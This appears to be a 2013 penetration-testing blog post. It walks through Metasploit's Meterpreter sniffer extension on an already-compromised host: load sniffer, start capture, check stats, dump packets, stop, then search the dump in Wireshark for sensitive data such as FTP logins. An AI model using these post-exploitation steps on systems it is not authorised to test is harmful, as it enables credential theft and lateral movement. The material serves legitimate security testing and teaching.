Monday, February 4, 2013

Sniff your PWNED Hosts

When you eat a cinnamon roll, don’t you save the center for last? Lick a Tootsie Pop for the  chocolate in the middle?  Attack (Pentest) a host to gain access to the internal network?

If you answered yes, then you’ll enjoy this quick post.  We’ll be using an extension of Metasploit – Sniffer.  Lets assume you’ve already compromised your target and have a Meterpreter shell.

Step 1 – Enable Extension = load sniffer

 image

Step 2 – Start sniffing = sniffer_start [interface] [packet buffer]

image

Step 3 – Monitor Statistics = sniffer_stats [interface]

image

Step 4 – Log into host remotely.  In this example we are using FTP to keep it simple.  We will look at stats again to see if it increments.

image

Notice the increase:

image

Step 5 – Download the packet captures = sniffer_dump [interface] [filename]

image

Step 6 – Open downloaded file in Wireshark and look for sensitive information.

image

Step 7 – Stop sniffer = sniffer_stop [interface]

image

This is a very simple example, but think of the possibilities.  We tend to have a warm and fuzzy feeling inside our networks since we are behind a firewall and have layers of security.  As you’ll see, there are other attacks that can pivot from your compromised hosts.  Again, comments and suggestions welcome.